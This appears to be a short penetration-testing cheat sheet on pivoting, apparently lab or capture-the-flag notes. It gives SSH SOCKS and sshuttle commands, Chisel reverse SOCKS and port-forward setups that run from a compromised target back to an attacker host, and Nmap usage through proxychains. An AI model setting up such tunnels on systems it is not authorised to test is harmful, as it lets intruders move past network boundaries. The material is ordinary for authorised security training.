Pivoting

Pivoting with SSH

# Pivoting with an SSH SOCKS proxy
ssh -D $port -q -C -N parzival@$ip

# Pivoting with SSHuttle 
## https://github.com/sshuttle/sshuttle
sshuttle -vr parzival@$ip $targetSubnet/24

Setting up a SOCKS Proxy with Chisel

Note, you will need the Chisel binary placed on both your attacking system the target system.

2. On the attacking system:

./chisel server --socks5 --reverse -p 8000

3. On the target system:

.\chisel.exe client $attackerip:8000 R:socks

4. Observe on the attacking system that the SOCKS5 connection has been successfully established.

Forwarding One Port with Chisel

1. On the attacking system:

./chisel server 8000 -reverse

2. On the target system:

# Listen on Kali 80, forward to localhost port 80 on client
.\chisel client $attackerip:8000 R:1337:127.0.0.1:1337

# Listen on Kali 4444, forward to 10.10.10.240 port 80
.\chisel client $attackerip:8000 R:4444:10.10.10.240:80

Verification

The easiest way to verify if your Chisel connection was successful is to run the following command:

ss -lnpt | grep $localport

Interaction

Ensure to remember that you will be interacting with localhost after forwarding a port. For example, by running

nmap -sC -sV -p3306 -n localhost

Nmap Scanning through Proxychains

When performing scans on the network through proxychains it is important to use the -sT flag. The following command demonstrates an Nmap command to use:

nmap -sT -Pn -n $port

References

SSH

Chisel